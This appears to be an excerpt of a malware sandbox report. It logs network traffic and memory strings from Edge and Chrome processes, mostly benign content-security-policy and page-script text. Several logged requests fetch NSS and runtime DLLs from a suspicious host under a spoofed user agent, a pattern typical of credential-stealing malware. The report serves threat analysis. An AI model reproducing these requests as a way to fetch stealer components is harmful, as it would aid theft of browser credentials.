Source: global traffic	HTTP traffic detected: GET /seg?add=5159620&redir=https%3A%2F%2Fib.adnxs.com%2Fsetuid%3Fentity%3D483%26code%3D172DCF8F4EDA69E736C3DAA54F2A68BD%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bounce?%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D172DCF8F4EDA69E736C3DAA54F2A68BD%2526gdpr%253D0%2526gdpr_consent%253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: tavukdun.websiteConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: tavukdun.websiteConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: tavukdun.websiteConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: tavukdun.websiteConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: tavukdun.websiteConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: tavukdun.websiteConnection: Keep-AliveCache-Control: no-cache

Source: msedge.exe, 0000002F.00000002.172812875801.00007B1C00CB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/;worker-src * blob: equals www.youtube.com (Youtube)
Source: msedge.exe, 0000002F.00000003.172531574251.00007B1C0187C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172531786449.00007B1C0180C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172531443365.00007B1C01798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "`r[https://www.linkedin.com/shareArticle?mini=true&url={url}&title={title}&source={refererUrl} equals www.linkedin.com (Linkedin)
Source: chrome.exe, 0000002C.00000002.172373073964.00000C6400881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: msedge.exe, 0000002F.00000003.172483025945.00007B1C012D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172483113629.00007B1C0086C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172483224572.00007B1C01300000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 'nonce-T+5LNPTOgbLY9EQBIWndIH5kwG2dyEXQx1IBQ9Jgzcg=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ connect.facebook.net geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/ equals www.facebook.com (Facebook)
Source: msedge.exe, 0000002F.00000003.172483025945.00007B1C012D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172483113629.00007B1C0086C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172483224572.00007B1C01300000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 'nonce-T+5LNPTOgbLY9EQBIWndIH5kwG2dyEXQx1IBQ9Jgzcg=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ connect.facebook.net geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/ equals www.youtube.com (Youtube)
Source: msedge.exe, 0000002F.00000003.172529630828.00007B1C00698000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172529567482.00007B1C010A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 'nonce-U04IfidlM+6SUjr1ln1FAn+VMvSYSQo0d/PM2yFw/ww=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ connect.facebook.net geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/ equals www.facebook.com (Facebook)
Source: msedge.exe, 0000002F.00000003.172529630828.00007B1C00698000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172529567482.00007B1C010A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 'nonce-U04IfidlM+6SUjr1ln1FAn+VMvSYSQo0d/PM2yFw/ww=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ connect.facebook.net geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/ equals www.youtube.com (Youtube)
Source: msedge.exe, 0000002F.00000002.172822642748.00007B1C01650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ connect.facebook.net geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/;worker-src * blob: equals www.facebook.com (Facebook)
Source: msedge.exe, 0000002F.00000002.172822642748.00007B1C01650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ connect.facebook.net geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/;worker-src * blob: equals www.youtube.com (Youtube)
Source: msedge.exe, 0000002F.00000002.172822642748.00007B1C01650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ connect.facebook.net geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/;worker-src * blob:{ equals www.facebook.com (Facebook)
Source: msedge.exe, 0000002F.00000002.172822642748.00007B1C01650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ connect.facebook.net geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/;worker-src * blob:{ equals www.youtube.com (Youtube)
Source: chrome.exe, 0000002C.00000002.172373073964.00000C6400881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000017.00000003.169455273322.00000D7400218000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169455110739.00000D7401540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172274853979.00000C64015C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$1()}render(){return getHtml$1.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$2=null;function getCss(){return instance$2\|\|(instance$2=[...[getCss$3()],css`:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chro
Source: chrome.exe, 00000017.00000003.169455273322.00000D7400218000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169455110739.00000D7401540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172274853979.00000C64015C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$1()}render(){return getHtml$1.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$2=null;function getCss(){return instance$2\|\|(instance$2=[...[getCss$3()],css`:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chro
Source: msedge.exe, 0000002F.00000003.172483645927.00007B1C01168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: eaming-video.msn.cn msn-api.go2yd.com zerocodecms.blob.core.windows.net .oneservice.msn.com .oneservice.msn.cn api.msn.com api.msn.cn ent-api.msn.com ent-api.msn.cn ppe-api.msn.com ppe-api.msn.cn graph.microsoft.com/beta/ graph.microsoft.com/v1.0/ https://.vo.msecnd.net https://user.auth.xboxlive.com/user/authenticate https://xsts.auth.xboxlive.com/xsts/authorize https://titlehub.xboxlive.com/users/ https://t.ssl.ak.dynamic.tiles.virtualearth.net https://dynamic.t0.tiles.ditu.live.com https://dev.virtualearth.net/REST/v1/Routes/ https://dev.ditu.live.com/REST/v1/Routes/ https://dev.virtualearth.net/REST/v1/Locations/ https://dev.ditu.live.com/REST/v1/Locations/ browser.events.data.microsoft.com ib.adnxs.com ib.msn.com;default-src 'none';font-src 'self' data: assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;frame-src https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com;img-src https:// blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:;media-src 'self' blob: .mavideo.microsoft.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn https://sapphire.azureedge.net th.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn video.yidianzixun.com liveshopping.azureedge.net;report-to csp-endpoint;require-trusted-types-for 'script';style-src 'self' 'unsafe-inline' c.s-microsoft.com/mscc/ assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;trusted-types serviceWorkerUrlPolicy baw-trustedtypes-policy svgPassThroughPolicy xmlPassThroughPolicy webpackTrustedTypesPolicy webWorkerUrlPolicy inlineHeadCssPassthroughPolicy bundleUrlPolicy fallbackBundleUrlPolicy scriptSrcUrlPolicy commonAsScriptPolicy dompurify fast-html base-html-policy ot-trusted-type-policy default 'allow-duplicates';worker-src 'self' blob: 'report-sample';script-src 'nonce-T+5LNPTOgbLY9EQBIWndIH5kwG2dyEXQx1IBQ9Jgzcg=' 'strict-dynamic',script-src 'nonce-T+5LNPTOgbLY9EQBIWndIH5kwG2dyEXQx1IBQ9Jgzcg=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ connect.facebook.net geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/;worker-src blob: equals www.facebook.com (Facebook)
Source: msedge.exe, 0000002F.00000003.172483645927.00007B1C01168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: eaming-video.msn.cn msn-api.go2yd.com zerocodecms.blob.core.windows.net .oneservice.msn.com .oneservice.msn.cn api.msn.com api.msn.cn ent-api.msn.com ent-api.msn.cn ppe-api.msn.com ppe-api.msn.cn graph.microsoft.com/beta/ graph.microsoft.com/v1.0/ https://.vo.msecnd.net https://user.auth.xboxlive.com/user/authenticate https://xsts.auth.xboxlive.com/xsts/authorize https://titlehub.xboxlive.com/users/ https://t.ssl.ak.dynamic.tiles.virtualearth.net https://dynamic.t0.tiles.ditu.live.com https://dev.virtualearth.net/REST/v1/Routes/ https://dev.ditu.live.com/REST/v1/Routes/ https://dev.virtualearth.net/REST/v1/Locations/ https://dev.ditu.live.com/REST/v1/Locations/ browser.events.data.microsoft.com ib.adnxs.com ib.msn.com;default-src 'none';font-src 'self' data: assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;frame-src https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com;img-src https:// blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:;media-src 'self' blob: .mavideo.microsoft.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn https://sapphire.azureedge.net th.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn video.yidianzixun.com liveshopping.azureedge.net;report-to csp-endpoint;require-trusted-types-for 'script';style-src 'self' 'unsafe-inline' c.s-microsoft.com/mscc/ assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;trusted-types serviceWorkerUrlPolicy baw-trustedtypes-policy svgPassThroughPolicy xmlPassThroughPolicy webpackTrustedTypesPolicy webWorkerUrlPolicy inlineHeadCssPassthroughPolicy bundleUrlPolicy fallbackBundleUrlPolicy scriptSrcUrlPolicy commonAsScriptPolicy dompurify fast-html base-html-policy ot-trusted-type-policy default 'allow-duplicates';worker-src 'self' blob: 'report-sample';script-src 'nonce-T+5LNPTOgbLY9EQBIWndIH5kwG2dyEXQx1IBQ9Jgzcg=' 'strict-dynamic',script-src 'nonce-T+5LNPTOgbLY9EQBIWndIH5kwG2dyEXQx1IBQ9Jgzcg=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ connect.facebook.net geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/;worker-src blob: equals www.youtube.com (Youtube)
Source: msedge.exe, 0000002F.00000003.172483645927.00007B1C01168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: eaming-video.msn.cn msn-api.go2yd.com zerocodecms.blob.core.windows.net .oneservice.msn.com .oneservice.msn.cn api.msn.com api.msn.cn ent-api.msn.com ent-api.msn.cn ppe-api.msn.com ppe-api.msn.cn graph.microsoft.com/beta/ graph.microsoft.com/v1.0/ https://.vo.msecnd.net https://user.auth.xboxlive.com/user/authenticate https://xsts.auth.xboxlive.com/xsts/authorize https://titlehub.xboxlive.com/users/ https://t.ssl.ak.dynamic.tiles.virtualearth.net https://dynamic.t0.tiles.ditu.live.com https://dev.virtualearth.net/REST/v1/Routes/ https://dev.ditu.live.com/REST/v1/Routes/ https://dev.virtualearth.net/REST/v1/Locations/ https://dev.ditu.live.com/REST/v1/Locations/ browser.events.data.microsoft.com ib.adnxs.com ib.msn.com;default-src 'none';font-src 'self' data: assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;frame-src https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com;img-src https:// blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:;media-src 'self' blob: .mavideo.microsoft.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn https://sapphire.azureedge.net th.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn video.yidianzixun.com liveshopping.azureedge.net;report-to csp-endpoint;require-trusted-types-for 'script';style-src 'self' 'unsafe-inline' c.s-microsoft.com/mscc/ assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;trusted-types serviceWorkerUrlPolicy baw-trustedtypes-policy svgPassThroughPolicy xmlPassThroughPolicy webpackTrustedTypesPolicy webWorkerUrlPolicy inlineHeadCssPassthroughPolicy bundleUrlPolicy fallbackBundleUrlPolicy scriptSrcUrlPolicy commonAsScriptPolicy dompurify fast-html base-html-policy ot-trusted-type-policy default 'allow-duplicates';worker-src 'self' blob: 'report-sample';script-src 'nonce-T+5LNPTOgbLY9EQBIWndIH5kwG2dyEXQx1IBQ9Jgzcg=' 'strict-dynamic',script-src 'nonce-T+5LNPTOgbLY9EQBIWndIH5kwG2dyEXQx1IBQ9Jgzcg=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ connect.facebook.net geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/;worker-src blob:X-Robots-Tag: noindexX-Content-Type-Options: nosniffX-XSS-Protection: 1X-UA-Compatible: IE=Edge;chrome=1x-fabric-cluster: pmeprodeusnel: {"report_
Source: msedge.exe, 0000002F.00000003.172483645927.00007B1C01168000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: eaming-video.msn.cn msn-api.go2yd.com zerocodecms.blob.core.windows.net .oneservice.msn.com .oneservice.msn.cn api.msn.com api.msn.cn ent-api.msn.com ent-api.msn.cn ppe-api.msn.com ppe-api.msn.cn graph.microsoft.com/beta/ graph.microsoft.com/v1.0/ https://.vo.msecnd.net https://user.auth.xboxlive.com/user/authenticate https://xsts.auth.xboxlive.com/xsts/authorize https://titlehub.xboxlive.com/users/ https://t.ssl.ak.dynamic.tiles.virtualearth.net https://dynamic.t0.tiles.ditu.live.com https://dev.virtualearth.net/REST/v1/Routes/ https://dev.ditu.live.com/REST/v1/Routes/ https://dev.virtualearth.net/REST/v1/Locations/ https://dev.ditu.live.com/REST/v1/Locations/ browser.events.data.microsoft.com ib.adnxs.com ib.msn.com;default-src 'none';font-src 'self' data: assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;frame-src https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com;img-src https:// blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:;media-src 'self' blob: .mavideo.microsoft.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn https://sapphire.azureedge.net th.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn video.yidianzixun.com liveshopping.azureedge.net;report-to csp-endpoint;require-trusted-types-for 'script';style-src 'self' 'unsafe-inline' c.s-microsoft.com/mscc/ assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;trusted-types serviceWorkerUrlPolicy baw-trustedtypes-policy svgPassThroughPolicy xmlPassThroughPolicy webpackTrustedTypesPolicy webWorkerUrlPolicy inlineHeadCssPassthroughPolicy bundleUrlPolicy fallbackBundleUrlPolicy scriptSrcUrlPolicy commonAsScriptPolicy dompurify fast-html base-html-policy ot-trusted-type-policy default 'allow-duplicates';worker-src 'self' blob: 'report-sample';script-src 'nonce-T+5LNPTOgbLY9EQBIWndIH5kwG2dyEXQx1IBQ9Jgzcg=' 'strict-dynamic',script-src 'nonce-T+5LNPTOgbLY9EQBIWndIH5kwG2dyEXQx1IBQ9Jgzcg=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ connect.facebook.net geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/;worker-src blob:X-Robots-Tag: noindexX-Content-Type-Options: nosniffX-XSS-Protection: 1X-UA-Compatible: IE=Edge;chrome=1x-fabric-cluster: pmeprodeusnel: {"report_
